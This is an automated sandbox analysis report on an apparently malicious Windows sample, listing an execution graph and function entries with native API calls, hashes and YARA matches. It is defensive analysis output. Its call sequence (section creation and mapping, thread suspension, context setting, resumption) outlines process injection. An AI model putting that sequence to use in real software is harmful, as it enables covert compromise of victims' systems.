                                  execution_graph 78656 425543 78657 42555f 78656->78657 78658 425587 78657->78658 78659 42559b 78657->78659 78661 42bf43 NtClose 78658->78661 78666 42bf43 78659->78666 78663 425590 78661->78663 78662 4255a4 78669 42deb3 RtlAllocateHeap 78662->78669 78665 4255af 78667 42bf5d 78666->78667 78668 42bf6a NtClose 78667->78668 78668->78662 78669->78665 78670 42be03 78671 42be78 78670->78671 78672 42be27 78670->78672 78675 40b743 78672->78675 78674 42be71 78678 40b768 78675->78678 78676 40b885 NtReadFile 78677 40b8bc 78676->78677 78677->78674 78678->78676 78679 42b683 78680 42b69d 78679->78680 78683 d9fdc0 LdrInitializeThunk 78680->78683 78681 42b6c1 78683->78681 78879 42ee73 78880 42ee83 78879->78880 78881 42ee89 78879->78881 78884 42de73 78881->78884 78883 42eeaf 78887 42c1f3 78884->78887 78886 42de8e 78886->78883 78888 42c210 78887->78888 78889 42c21d RtlAllocateHeap 78888->78889 78889->78886 78890 42bcd3 78891 42bd4d 78890->78891 78892 42bcf4 78890->78892 78895 40b513 78892->78895 78894 42bd46 78898 40b538 78895->78898 78896 40b655 NtCreateFile 78897 40b694 78896->78897 78897->78894 78898->78896 78899 4258d3 78904 4258e2 78899->78904 78900 42596c 78901 425929 78902 42dd93 RtlFreeHeap 78901->78902 78903 425939 78902->78903 78904->78900 78904->78901 78905 425967 78904->78905 78906 42dd93 RtlFreeHeap 78905->78906 78906->78900 78907 41c1d3 78908 41c217 78907->78908 78909 41c238 78908->78909 78914 42b463 78908->78914 78911 41c228 78912 41c244 78911->78912 78913 42bf43 NtClose 78911->78913 78913->78909 78915 42b487 78914->78915 78916 42b4bc 78914->78916 78919 40a673 78915->78919 78916->78911 78918 42b4b5 78918->78911 78922 40a698 78919->78922 78920 40a7b5 NtSuspendThread 78921 40a7d0 78920->78921 78921->78918 78922->78920 78923 41b6f3 78924 41b765 78923->78924 78925 41b70b 78923->78925 78925->78924 78927 41f2f3 78925->78927 78929 41f319 78927->78929 78928 41f532 78928->78924 78929->78928 78950 42efa3 78929->78950 78931 41f3ab 78931->78928 78932 41f479 78931->78932 78933 42b6d3 LdrInitializeThunk 78931->78933 78942 41f498 78932->78942 78958 419dd3 NtMapViewOfSection 78932->78958 78935 41f407 78933->78935 78935->78932 78937 41f410 78935->78937 78936 41f461 78940 41c253 NtDelayExecution 78936->78940 78937->78928 78937->78936 78938 41f442 78937->78938 78956 419dd3 NtMapViewOfSection 78937->78956 78957 427f83 NtDelayExecution 78938->78957 78939 41f51a 78945 41c253 NtDelayExecution 78939->78945 78944 41f46f 78940->78944 78942->78939 78947 42b3e3 NtSetContextThread 78942->78947 78944->78924 78946 41f528 78945->78946 78946->78924 78948 41f50b 78947->78948 78949 42b4e3 NtResumeThread 78948->78949 78949->78939 78951 42ef13 78950->78951 78952 42ef70 78951->78952 78953 42de73 RtlAllocateHeap 78951->78953 78952->78931 78954 42ef4d 78953->78954 78955 42dd93 RtlFreeHeap 78954->78955 78955->78952 78956->78938 78957->78936 78958->78942 78959 415393 78960 4153ad 78959->78960 78965 418ba3 78960->78965 78962 4153cb 78963 415410 78962->78963 78964 4153ff PostThreadMessageW 78962->78964 78964->78963 78967 418bc7 78965->78967 78966 418bce 78966->78962 78967->78966 78968 418c03 LdrLoadDll 78967->78968 78969 418c1a 78967->78969 78968->78969 78969->78962 78684 401b24 78685 401b2a 78684->78685 78685->78685 78688 42f333 78685->78688 78691 42d983 78688->78691 78692 42d9a9 78691->78692 78703 4073f3 78692->78703 78694 42d9bf 78702 401c4b 78694->78702 78706 41bfe3 78694->78706 78696 42d9de 78697 42d9f3 78696->78697 78721 42c293 78696->78721 78717 428813 78697->78717 78700 42da02 78701 42c293 ExitProcess 78700->78701 78701->78702 78724 417a63 78703->78724 78705 407400 78705->78694 78707 41c00f 78706->78707 78746 41bed3 78707->78746 78710 41c03c 78711 42bf43 NtClose 78710->78711 78714 41c047 78710->78714 78711->78714 78712 41c070 78712->78696 78713 41c054 78713->78712 78715 42bf43 NtClose 78713->78715 78714->78696 78716 41c066 78715->78716 78716->78696 78718 42886d 78717->78718 78720 42887a 78718->78720 78757 4196f3 78718->78757 78720->78700 78722 42c2b0 78721->78722 78723 42c2c1 ExitProcess 78722->78723 78723->78697 78725 417a7a 78724->78725 78727 417a8f 78725->78727 78728 42c933 78725->78728 78727->78705 78730 42c94b 78728->78730 78729 42c96f 78729->78727 78730->78729 78735 42b6d3 78730->78735 78736 42b6ed 78735->78736 78742 d9fae8 LdrInitializeThunk 78736->78742 78737 42b715 78739 42dd93 78737->78739 78743 42c243 78739->78743 78741 42c9d9 78741->78727 78742->78737 78744 42c260 78743->78744 78745 42c26d RtlFreeHeap 78744->78745 78745->78741 78747 41beed 78746->78747 78751 41bfc9 78746->78751 78752 42b773 78747->78752 78750 42bf43 NtClose 78750->78751 78751->78710 78751->78713 78753 42b78d 78752->78753 78756 da07ac LdrInitializeThunk 78753->78756 78754 41bfbd 78754->78750 78756->78754 78760 41971d 78757->78760 78758 419b8b 78758->78720 78760->78758 78781 424f13 78760->78781 78761 4197bc 78761->78758 78784 4154c3 78761->78784 78763 41982a 78763->78758 78764 42dd93 RtlFreeHeap 78763->78764 78766 419842 78764->78766 78765 419874 78771 41987b 78765->78771 78794 41c083 78765->78794 78766->78765 78790 406f73 78766->78790 78768 4198b4 78768->78758 78814 42b873 78768->78814 78771->78758 78801 42b3e3 78771->78801 78773 419931 78774 419b1a 78773->78774 78806 406fe3 78773->78806 78777 419b3d 78774->78777 78819 42b4e3 78774->78819 78779 419b5a 78777->78779 78810 41c253 78777->78810 78780 42c293 ExitProcess 78779->78780 78780->78758 78824 42dd03 78781->78824 78783 424f34 78783->78761 78785 415529 78784->78785 78786 4154e2 78784->78786 78787 415600 78785->78787 78836 414f13 78785->78836 78786->78785 78786->78787 78788 41c253 NtDelayExecution 78786->78788 78787->78763 78788->78786 78791 406fa3 78790->78791 78792 41c253 NtDelayExecution 78791->78792 78793 406fc4 78791->78793 78792->78791 78793->78765 78795 41c0a0 78794->78795 78844 42b7c3 78795->78844 78797 41c0f0 78798 41c0f7 78797->78798 78799 42b873 NtMapViewOfSection 78797->78799 78798->78768 78800 41c120 78799->78800 78800->78768 78802 42b407 78801->78802 78804 42b43c 78801->78804 78853 40aa93 78802->78853 78804->78773 78805 42b435 78805->78773 78808 407003 78806->78808 78807 41c253 NtDelayExecution 78807->78808 78808->78807 78809 407023 78808->78809 78809->78774 78811 41c266 78810->78811 78857 42b603 78811->78857 78813 41c291 78813->78777 78815 42b894 78814->78815 78817 42b8e9 78814->78817 78866 40b2e3 78815->78866 78817->78771 78818 42b8e2 78818->78771 78820 42b539 78819->78820 78821 42b504 78819->78821 78820->78777 78870 40aca3 78821->78870 78823 42b532 78823->78777 78827 42c073 78824->78827 78826 42dd34 78826->78783 78828 42c094 78827->78828 78829 42c0d9 78827->78829 78832 40bfd3 78828->78832 78829->78826 78831 42c0d2 78831->78826 78835 40bff8 78832->78835 78833 40c115 NtAllocateVirtualMemory 78834 40c140 78833->78834 78834->78831 78835->78833 78839 42c163 78836->78839 78840 42c17d 78839->78840 78843 d9fb68 LdrInitializeThunk 78840->78843 78841 414f35 78841->78787 78843->78841 78845 42b7e4 78844->78845 78848 42b82d 78844->78848 78849 40b0c3 78845->78849 78847 42b826 78847->78797 78848->78797 78852 40b0e8 78849->78852 78850 40b205 NtCreateSection 78851 40b234 78850->78851 78851->78847 78852->78850 78855 40aab8 78853->78855 78854 40abd5 NtSetContextThread 78856 40abf0 78854->78856 78855->78854 78856->78805 78858 42b627 78857->78858 78859 42b65c 78857->78859 78862 40bbb3 78858->78862 78859->78813 78861 42b655 78861->78813 78864 40bbd8 78862->78864 78863 40bcf5 NtDelayExecution 78865 40bd11 78863->78865 78864->78863 78865->78861 78869 40b308 78866->78869 78867 40b425 NtMapViewOfSection 78868 40b460 78867->78868 78868->78818 78869->78867 78871 40acc8 78870->78871 78872 40ade5 NtResumeThread 78871->78872 78873 40ae00 78872->78873 78873->78823 78874 d9f9f0 LdrInitializeThunk 78875 419d2f 78876 419d33 78875->78876 78877 42bf43 NtClose 78876->78877 78878 419db2 78877->78878

                                  Executed Functions

                                  Function 0040B2E3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15 40b2e3-40b347 call 40a113 call 40a123 20 40b425-40b45a NtMapViewOfSection 15->20 21 40b34d-40b392 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 15->21 23 40b460-40b467 20->23 24 40b4f7-40b503 20->24 43 40b39d-40b3a3 21->43 26 40b472-40b478 23->26 28 40b4a0-40b4a4 26->28 29 40b47a-40b49e 26->29 32 40b4e6-40b4f4 call 40a1b3 28->32 33 40b4a6-40b4ad 28->33 29->26 32->24 35 40b4b8-40b4be 33->35 35->32 38 40b4c0-40b4e4 35->38 38->35 44 40b3a5-40b3c9 43->44 45 40b3cb-40b3cf 43->45 44->43 45->20 47 40b3d1-40b3ec 45->47 48 40b3f7-40b3fd 47->48 48->20 49 40b3ff-40b423 48->49 49->48
                                  APIs
                                  • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,4q@,?,?,?,00000000), ref: 0040B44D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SectionView
                                  • String ID: 4q@$4q@
                                  • API String ID: 1323581903-352822288
                                  • Opcode ID: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                  • Instruction ID: 4f0a1b00017ecff07558768542bc8224e4be8ae8b3833d489124d6a477246c7f
                                  • Opcode Fuzzy Hash: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                  • Instruction Fuzzy Hash: 16711C71E04158DFCB04CFA9C990AEDBBF5AF49304F18816AE859B7341D738AA45CF98
                                  Function 0040B513 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 99 40b513-40b577 call 40a113 call 40a123 104 40b655-40b68e NtCreateFile 99->104 105 40b57d-40b5c2 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 99->105 107 40b694-40b69b 104->107 108 40b72b-40b737 104->108 127 40b5cd-40b5d3 105->127 110 40b6a6-40b6ac 107->110 112 40b6d4-40b6d8 110->112 113 40b6ae-40b6d2 110->113 116 40b71a-40b728 call 40a1b3 112->116 117 40b6da-40b6e1 112->117 113->110 116->108 120 40b6ec-40b6f2 117->120 120->116 121 40b6f4-40b718 120->121 121->120 128 40b5d5-40b5f9 127->128 129 40b5fb-40b5ff 127->129 128->127 129->104 130 40b601-40b61c 129->130 132 40b627-40b62d 130->132 132->104 133 40b62f-40b653 132->133 133->132
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B681
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                  • Instruction ID: 33bbf8d930d8e7cfe3f019b155e8ea3f1efd11963211b11a84fa3dbb01a3117a
                                  • Opcode Fuzzy Hash: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                  • Instruction Fuzzy Hash: 1C813D71E041589FCB04CFA9C990AEDBBF5AF49304F18816AE459B7341D738A941CF99
                                  Function 0040B743 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 135 40b743-40b7a7 call 40a113 call 40a123 140 40b885-40b8b6 NtReadFile 135->140 141 40b7ad-40b7f2 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 135->141 143 40b953-40b95f 140->143 144 40b8bc-40b8c3 140->144 163 40b7fd-40b803 141->163 146 40b8ce-40b8d4 144->146 148 40b8d6-40b8fa 146->148 149 40b8fc-40b900 146->149 148->146 152 40b942-40b950 call 40a1b3 149->152 153 40b902-40b909 149->153 152->143 155 40b914-40b91a 153->155 155->152 158 40b91c-40b940 155->158 158->155 164 40b805-40b829 163->164 165 40b82b-40b82f 163->165 164->163 165->140 167 40b831-40b84c 165->167 168 40b857-40b85d 167->168 168->140 169 40b85f-40b883 168->169 169->168
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B8A9
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                  • Instruction ID: d5ca7a445566d5324237c67d8bda7c3d62ebcdba52f65f536e33ce5b52a41de4
                                  • Opcode Fuzzy Hash: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                  • Instruction Fuzzy Hash: 6B713BB1E14158DBCB04CFA9C890AEDBBF5BF49304F18816AE859B7351D338A945CF98
                                  Function 0040B0C3 Relevance: 1.7, APIs: 1, Instructions: 180nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 171 40b0c3-40b0e2 172 40b0e8-40b127 call 40a123 171->172 173 40b0e3 call 40a113 171->173 176 40b205-40b22e NtCreateSection 172->176 177 40b12d-40b172 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 172->177 173->172 179 40b234-40b23b 176->179 180 40b2cb-40b2d7 176->180 199 40b17d-40b183 177->199 182 40b246-40b24c 179->182 184 40b274-40b278 182->184 185 40b24e-40b272 182->185 187 40b2ba-40b2c8 call 40a1b3 184->187 188 40b27a-40b281 184->188 185->182 187->180 190 40b28c-40b292 188->190 190->187 193 40b294-40b2b8 190->193 193->190 200 40b185-40b1a9 199->200 201 40b1ab-40b1af 199->201 200->199 201->176 202 40b1b1-40b1cc 201->202 204 40b1d7-40b1dd 202->204 204->176 205 40b1df-40b203 204->205 205->204
                                  APIs
                                  • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,004070F1,00000000,?,?,08000000), ref: 0040B221
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateSection
                                  • String ID:
                                  • API String ID: 2449625523-0
                                  • Opcode ID: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                  • Instruction ID: 01317c8874684397ccd25c89dd95e7ea8e4a3edbd884f59941ddaf063ff58e3a
                                  • Opcode Fuzzy Hash: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                  • Instruction Fuzzy Hash: CD712C71D14158DFCB05CFA9C890AEDBBB1BF49304F1881AAE859B7341D738A946CF98
                                  Function 0040BFD3 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 207 40bfd3-40c037 call 40a113 call 40a123 212 40c115-40c13a NtAllocateVirtualMemory 207->212 213 40c03d-40c082 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 207->213 214 40c140-40c147 212->214 215 40c1d7-40c1e3 212->215 235 40c08d-40c093 213->235 217 40c152-40c158 214->217 219 40c180-40c184 217->219 220 40c15a-40c17e 217->220 222 40c1c6-40c1d4 call 40a1b3 219->222 223 40c186-40c18d 219->223 220->217 222->215 227 40c198-40c19e 223->227 227->222 229 40c1a0-40c1c4 227->229 229->227 236 40c095-40c0b9 235->236 237 40c0bb-40c0bf 235->237 236->235 237->212 238 40c0c1-40c0dc 237->238 240 40c0e7-40c0ed 238->240 240->212 241 40c0ef-40c113 240->241 241->240
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C12D
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                  • Instruction ID: 8143565c1ed0993058e6d586fa4036d4e587653beb669d54d7f95b9336940cd5
                                  • Opcode Fuzzy Hash: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                  • Instruction Fuzzy Hash: 62712F71E04158DFCB04CFA9C890AEDBBF1BF49304F18816AE859BB341D638A946CF55
                                  Function 0040AA93 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 279 40aa93-40aaf7 call 40a113 call 40a123 284 40abd5-40abea NtSetContextThread 279->284 285 40aafd-40ab42 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 279->285 286 40abf0-40abf7 284->286 287 40ac87-40ac93 284->287 307 40ab4d-40ab53 285->307 290 40ac02-40ac08 286->290 292 40ac30-40ac34 290->292 293 40ac0a-40ac2e 290->293 296 40ac76-40ac84 call 40a1b3 292->296 297 40ac36-40ac3d 292->297 293->290 296->287 299 40ac48-40ac4e 297->299 299->296 302 40ac50-40ac74 299->302 302->299 308 40ab55-40ab79 307->308 309 40ab7b-40ab7f 307->309 308->307 309->284 311 40ab81-40ab9c 309->311 312 40aba7-40abad 311->312 312->284 313 40abaf-40abd3 312->313 313->312
                                  APIs
                                  • NtSetContextThread.NTDLL(?,?), ref: 0040ABDD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                  • Instruction ID: d4e5869915a99125bcdad7944eea00a2bf72dfbca1512e106d76b181c7b9fddb
                                  • Opcode Fuzzy Hash: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                  • Instruction Fuzzy Hash: DC718F71E04258DFCB04CFA9C490AEDBBF2BF49304F18806AE419BB341D638A956DF55
                                  Function 0040BBB3 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 351 40bbb3-40bbd2 352 40bbd8-40bc17 call 40a123 351->352 353 40bbd3 call 40a113 351->353 356 40bcf5-40bd0b NtDelayExecution 352->356 357 40bc1d-40bc62 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 352->357 353->352 359 40bd11-40bd18 356->359 360 40bda8-40bdb4 356->360 379 40bc6d-40bc73 357->379 362 40bd23-40bd29 359->362 364 40bd51-40bd55 362->364 365 40bd2b-40bd4f 362->365 368 40bd97-40bda5 call 40a1b3 364->368 369 40bd57-40bd5e 364->369 365->362 368->360 372 40bd69-40bd6f 369->372 372->368 373 40bd71-40bd95 372->373 373->372 380 40bc75-40bc99 379->380 381 40bc9b-40bc9f 379->381 380->379 381->356 383 40bca1-40bcbc 381->383 384 40bcc7-40bccd 383->384 384->356 385 40bccf-40bcf3 384->385 385->384
                                  APIs
                                  • NtDelayExecution.NTDLL(0041C291,?,?,?,00000000), ref: 0040BCFE
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DelayExecution
                                  • String ID:
                                  • API String ID: 1249177460-0
                                  • Opcode ID: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                  • Instruction ID: 224df048350992204dea636a9cf2136097186a6e34023e583b2a4fcadb8b91eb
                                  • Opcode Fuzzy Hash: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                  • Instruction Fuzzy Hash: CC712E71E04258DFCB05CFA9C490AEDBBF1AF49304F1880AAE855B7341D738AA45DF99
                                  Function 0040ACA3 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 315 40aca3-40acc2 316 40acc8-40ad07 call 40a123 315->316 317 40acc3 call 40a113 315->317 320 40ade5-40adfa NtResumeThread 316->320 321 40ad0d-40ad52 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 316->321 317->316 323 40ae00-40ae07 320->323 324 40ae97-40aea3 320->324 343 40ad5d-40ad63 321->343 326 40ae12-40ae18 323->326 328 40ae40-40ae44 326->328 329 40ae1a-40ae3e 326->329 330 40ae86-40ae94 call 40a1b3 328->330 331 40ae46-40ae4d 328->331 329->326 330->324 334 40ae58-40ae5e 331->334 334->330 337 40ae60-40ae84 334->337 337->334 344 40ad65-40ad89 343->344 345 40ad8b-40ad8f 343->345 344->343 345->320 346 40ad91-40adac 345->346 348 40adb7-40adbd 346->348 348->320 349 40adbf-40ade3 348->349 349->348
                                  APIs
                                  • NtResumeThread.NTDLL(004071D5,?,?,?,?), ref: 0040ADED
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                  • Instruction ID: b6f10511c00207d67f0fbc32bcefce55cc479fdc692c5c7557564370438ddd56
                                  • Opcode Fuzzy Hash: e82c6908598d20ec0be45675678c3b10373641ab3eec8e70e69c302ce30f2250
                                  • Instruction Fuzzy Hash: D3715F71E04258DFCB04CFA9C890AEDBBF2BF49304F18806AE859B7341D638A955CF95
                                  Function 0040A673 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 243 40a673-40a6d7 call 40a113 call 40a123 248 40a7b5-40a7ca NtSuspendThread 243->248 249 40a6dd-40a722 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 243->249 251 40a7d0-40a7d7 248->251 252 40a867-40a873 248->252 271 40a72d-40a733 249->271 254 40a7e2-40a7e8 251->254 256 40a810-40a814 254->256 257 40a7ea-40a80e 254->257 260 40a856-40a864 call 40a1b3 256->260 261 40a816-40a81d 256->261 257->254 260->252 263 40a828-40a82e 261->263 263->260 266 40a830-40a854 263->266 266->263 272 40a735-40a759 271->272 273 40a75b-40a75f 271->273 272->271 273->248 275 40a761-40a77c 273->275 276 40a787-40a78d 275->276 276->248 277 40a78f-40a7b3 276->277 277->276
                                  APIs
                                  • NtSuspendThread.NTDLL(?,?), ref: 0040A7BD
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SuspendThread
                                  • String ID:
                                  • API String ID: 3178671153-0
                                  • Opcode ID: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                  • Instruction ID: e0512f439ae47d9be5cbe886a187579ca4bcb7003b3baa994f3caa2f25e50319
                                  • Opcode Fuzzy Hash: df1744cd3ab3c9e63664b9d7c7920faaf1bd56dff2a6f15b324ade073ee0abe8
                                  • Instruction Fuzzy Hash: 95714F75E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7341D638A956CF95
                                  Function 00418BA3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00418C15
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                  • Instruction ID: 3a7d3c80330e5758b3a9f81f32ca88ff767ca5b188dc6faacfe14b01834f0b54
                                  • Opcode Fuzzy Hash: 1ece3eff7ef69611ee126556be6f4899efe61f532828b703a8cdf4cdaaeb4af3
                                  • Instruction Fuzzy Hash: 470152B5E0010DB7DB10DAE5DD42FDEB7789B54308F0081AAE90897240F635EB588795
                                  Function 0042BF43 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407230568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_loud89334.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                  • Instruction ID: d89d2c0c652fac5e8b7a6d34093b53a94ebb12e8b588f04006b5246e933adf9e
                                  • Opcode Fuzzy Hash: 798d9c3876bce148b54ee63ea797cdf3a6eb52ae3eb05a8af88ddaea95a2db47
                                  • Instruction Fuzzy Hash: DBE08C723402187BC620EA5ADC42F9BB7ADDFC5B14F01405AFA08A7281D6B0B9108BF4
                                  Function 00DA07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E84000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E87000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000EF0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_d80000_loud89334.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                  Function 00D9F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.407304379.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D80000, based on PE: true
                                  • Associated: 00000006.00000002.407304379.0000000000D80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000006.00000002.407304379.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
